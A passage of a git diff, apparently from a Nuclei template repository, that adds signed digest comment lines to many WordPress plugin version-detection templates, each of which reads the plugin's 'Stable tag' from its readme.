digest: 4b0a00483046022100d5b4329a011ce5ccbbe41f0da0ead9c1f87a57e82ca8f76685e4d0fd9d990942022100bbafaa5a437b3095925aadf5791a18c22f1aa21ab520bc0d90ca00cc36bc1086:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index f10480fc8f..d110ea3aee 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202e1eef951c37ea75f70b5eeb2586d7171b32a9d5cfa9f28380252a89de810e39022002c7ad818c1c3993a4765610e8342f6e9e3bf8b49cb21415d5c4d9b3cf404eaa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 6c92091767..6606197153 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100caf40b8c208f43d7d0a772ea017d7a89fd5db691f4306cb03a302be255f381e802210091c67aa5f24345aebbd5efcb173d9a4cb696b16fabe874e3d307936ab0b5bac0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index b25c6c9a9c..b2d59b1a20 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022013cfff7b2d20f298f8c39b51e8dd323f58dcc503a0491d5bd72916dee808b35a02204a7e8588dfb8c657703671b6bdb129fa7e130fc04a57fa7c974a2c6c63c60885:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 1781172d05..04c7dfae46 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ab9d7e3332c3271069c5ed442682b3a3c613eedb360b34d760eb9d387a2c31a9022100ecb73f30b7eb51b710f2661c5380688a60f4aa8ab3c12c2033f53e2228a2bb39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 92c8ce3409..c0304fe8d1 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bf964678eeffe0ab3986606ce64b7254a1f5a602ee98f6bfabaa0b5b85b73dcd022100d7c562547904d62948f976705361fb06e72fcf55cf680884920fe7b275774eb5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index eea42ed8da..9933e0e54b 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022023fb4bbbfdf8dbbef7ba3f6361d6f5469b21aa78bc5c3b8e15cc36f75710a100022025665ace8f21a360d7bb123ca83e0c16469bf19592f8d8e770be4f29dd3cfa9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index bedb85a0eb..7f5992295a 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220730c0745c66ccd562cc3483d17a7a65262a730e7f24caf3af1c640833052b3fe02210093afe268c932847e5c59fc8477b7a74e001379159f60b2c393aa17cbd0ab62cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 45bbbc71df..219c43dabe 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100def846a7f93b7da735d4c19720218fd19e04de5fa2dd177eff14061ed86bcdb5022064e18e9ac4f3db5376486732b48304b0f0a6e88df003e9903ae14bab10ac0b94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 03befac73e..ed5dc0d5af 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009dc4669d0419df1f880090e0f1cdb309ebb986d25f52f3efb2851a603b916da202210098c5f85830e4eb8b58d4ac6cd46cbedc3ff41aa6f22e409e4d70582fbd076386:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index e1f0093127..0c83f21057 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c7471ab75a3494c1b8215e6b8c5030b8b5cad6b59e9916fcfe66ca4b83056a84022100e56eedc2a09142969b7eb146a5f7a5db6baaffdd00294981cfe1b5a8699dabc2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 0db316d66d..105dd2356f 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210080c7cfc2e7629ef8d0386d3b3d5b881e93d5b0182f1bc163761a55925b339a4e022100ea77751e3db4bd2b1a39b783941642c389408baef981cd663b15235fe89ff638:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 135639253d..388cbff25a 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201d75bf1a8d9b02ef4576f4803ae8292db8f5944e093b48c8480b290ff0cd6076022100dba41bd4ba6986054bb29f3f2dbf274a4283450c8465b2111734b3a1f3066497:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 540fbaf9ac..198e1163e4 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d26c83fc51a3dddf8a2daeea72f22b1d82e0afcc9ad9346a4dbaed911986199b022100ce2cbbd494c4ec69ade40ace246fcf552a042cd1614ccc1e1604801852bdffa2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 7e71b4736f..e2bf8b3260 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220402a0f1de5e87e76f56b3a70d8d582e493a708a702444f658ebd1aebb9bd6890022100d385d89b54b013d7f85f9229260900d833a8fab4e331703576e01132ab1a5a3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 88a70b2478..f06541f699 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220324cae64e6802a948e37cdf72f8b6b03f3bcd739db5902ddaab9ade9159979c4022022d91768dd41f56e82be14796e6c14d12c4fef9cf60d3e4a29211965996218f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index fc498e67e6..bfe58ec366 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206997656ce4ef806e47d7cfa49ec4a168bbb14719b3c0b62641bc8e533b32755f022100d807dfdd703eeee7011003b8fb1f1b1b246b302905f3c66924ed8a4e426c5ec2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 465aa93d57..cd41ecfa53 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204e2f6fa8d25fb47b295b6d8e7c0f3de812fe2e3322c7b60b0d5de84c7f7752c102206d1c0ae3c77b428fe9132ee83f63ba0d5f49265c60f56923c1729cb3be571d98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a1b0e57a9..62ea9cafa4 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f0e959a0846adb82293fccfabb1a0595f8d04e8712bac443795b80af37802c540220166b41b089b0f19d87be68612617b6d91e46d19a009bd5fabcd483c9f33dba54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index df35e8b415..401c27db6d 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100925cd8f02843b73cbe943690a7644c5408787b345bcc527c63854758a86c140a022100d779764ce0df3cd99515d14633319def94008875743fcfe275b2af5c0dbcc04a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 033cc4bc3d..d5a974d5b9 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022074d346dc51e8c9b72d0c002b0487244b8a13a1da1cb2b8cebca252a84317088e022100d1ffb2dea89a027dfc56b49317f1c46312305b6ff072ca16f72f1c0df7bbbbe6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 945ab6ad03..67727882c1 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022050b1f076c1d027d861cb4a9b816acf92dddae80ad31767ecff6b1e2fff2b2fc60220478e88fa4aaf1f3a1eefa915b86c6960eea977f631f1180926e034e506274bd1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 2072b51ab9..8f260ffa47 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206cb0b60dea28fc6d98d3e84c66627e12d2ebbe7f8d35632bde792f6708156e42022073e943f88ee0aef0dc24fc5f6e296b75e4eb9402a2d1a2916224e8f02cfdcdae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index b509d8cc67..e946b5e7a1 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200f4d3cc3f325823d2f552dfc7c1e334d87684b040afcc6db4f629042ac5f1242022100b7d94e251896cfaac1bf440d519dba623946d2c23436de024051fc02c4e68a4c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c984479bde..5e5b666991 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f01970414536598fd02882897e709776d786cd594380520f63dee038cb4a86b0022100afc8d08f576decbf214e92895a0a71eaf5f0c71e229906671b7aef82b9648a2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index a3870175c7..f66febcbee 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204705ff0e2fd523d0307eb2e6f4fba1638d0f7f5ebc2c4a5a88ea5f3097aea8cc02206fe1d64a39373108ebebbcf5be2ee74a85ba64e166ff73e3dcee4bb5b01b9063:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index f5f3818ea2..c318505f64 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d8ff6f44f65332d2d4d4627e74a7e68565048d5867424d86308a2337a454ca79022100d66bfe9f2f5b923628529f37275918bb4399c22e96435e3542d84566b2a39739:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 7e5b54c12c..03cb698ed8 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e8dfa3ce5ea32b75e680e11515a8d788c8b0ffc7b25ffc49745963d0ffa702e1022100b98d7d569be204f188f4e5c10716c2c127392e7864167da72d49539087aab211:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 59effd09f6..884d053fa8 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202c4bffc82d34053f425137be3f58a1ce2bfbac3cbd8fe8901714ddbad0b1dec90220684685c2c2cf005809dd6c8bf490940c73703b63c8e4ad5f66b3d00eac239111:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 833207dcff..aacb6cce0b 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022067c3038b61827f05c268049fb1d643382c4df8007f40ef6d4040f696d086729e02200e11dfac55ebcdd2d5a08fe4325765e37363cc040f9e0f6ee5af730295a2543b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index b7ea2d38d1..a327518260 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220606a401425033c8177d07c2ac4d55eb6479684f537b01053a28c1e875b4b6a42022059f4743c432b9a7b5fe5b7d55ae57fe0bf5ae339ba7fed9c8a18ba7e0286f969:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2131dbe751..7a8805ffd8 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e38cb26964e8150402d572fad32aa795ed5ac5072112ea8f38a1dacbfab5f09d02206fdb29c6eca42f83f57689bb71ff68dd6680e0bb40fb847cf596e8f40dbca9b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 73d644c5e4..1d2feb1145 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203f55788225c60a6e7a39a2c2171acd1cb13ff58b2dc76780f004463b7427b74e02201f585cc3f392cc55694d8a53661df888a23d214ef75bf59c2c61c47834c641d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 7b0593dcb7..2272a737d3 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220022499a5e10dba8af89691be9797b3e57b94b5dffa07b4e44018fc7967b3d26e022052d0cde1f95f114bacfd766b352a52943fbdf66d078edc10ff73489e61abcfe0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 6f65d087e4..3ef22479c4 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022053cd70b73584d6590939c73dcbf66bc3af428ed47d4bcde6d172bd3752345c2902204ec71a740f86ecb2c915ce2122acc8247f4ce12f6ac54d9df0f2d3645f6d757f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 783cdd283d..85f095c1be 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022011019f79d385ffebdc44b9c4ecb5f0bb878628612e3ab3c37a39e417500fb8b402210082844480b3678a688f31943aba00a9506e515f51840dc54c62305f7835143058:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 05121854b3..40ca4fb06b 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022070b5293a1e8d811661f8f8e79de3d3a1991b4d516e99e0b20ed54f50dd1790b1022100ebff72879f9a1f3928e1cabc75a0d46042244409c54fe2dc4d162dd5883e7d80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 72f52edcd4..a346b34837 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100aee5675b17f7ffc50a8741ab42e39e3137bcedd07aa84c93cebba8d6ef748ecf022100b213ddeb2c3bbe8fd194c8642a543d9613ffebccfb7dd66e76f3f54644cf1fcb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 4cf45ebd74..a62375a683 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220268c92fcfcc2937a6d692b63e4535c4dbcc453441a9d395ee72cd0b80277b2b302203fc17e0b74aa7676c50b3c87a37faadf8b645ab9fb0e7af3c8d4c9b766cadac3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 3d6863e074..a3a0894168 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022061123fb4a15d025a5a1efbda97bf2ce72e8b5b605b3b9017610a9db60f7fa1fb022100f893e43f59625890bcad78a812319f9981f15f0b18fe68fb03dc987ccabee6f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 79e2813c5e..186c97cc38 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f7c297066bb903fc2b3ae3b49bfddbb25256d6cf65186a322a9c98fb1b7d5779022033eb9c53a932eb6eadff602493f410a33305d988fc5e9a2b6b01088372b60929:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ab9a0f1ae3..4a5c32ea9d 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202938e359fe8da926ec8533d5be6d14a7619f5e8cadbbde1a9f11308bc4548d7c0220490835f9b249138b32455e869e1efdafbdd36179ba3c1db3366959dc87bd4413:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 5d3adf7c27..d4a9389590 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e4a7ac83006f709a584a44ab37948be2763f04638112364473036b17733dbc26022100cd9cac2d82aca82be0c86929a820569c470ee27ee734b27065c0ab3506840f9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index eda1d27f04..b5e4c6c4dc 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fd9b9a2ec7b39f4565e82893040c591e6eadbeb4783f13ef6ba5dd0ae1e97118022013631d339d338720d09ba637435b1fb866edec44384b854dc1fad402b1c1d0dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 16dfc8df5f..96f4da8033 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220467412b446b3d9652eab6f6418816b7672d3325552bc1e17c7bfd2f95f465ebe02202bd7e897e3bf3f3486ab67594e1697edb5f3a51626baba0855c2356292cb2919:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 4b7600ea69..cc68cf0fbe 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ea9a6680248e01a68e00908985de5fc915a805cfe53cf10be357290330f4d2d3022100d3349d6e62189564b6f3c31c7aa1764e258913a7ebc1df2633b528200c8d2e86:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 2ccd4dbce8..341ecdb99f 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022075886eaa19914e7fa648a774c07824f6f646bb6f78f42cf613fa93f61d5041ce0220212460f5844ed76624c1645fb99225b9c82166086f94631581d9b45896e06e3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 02ceb224d1..1195c7f890 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,3 +46,4 @@ http: part: body regex: - 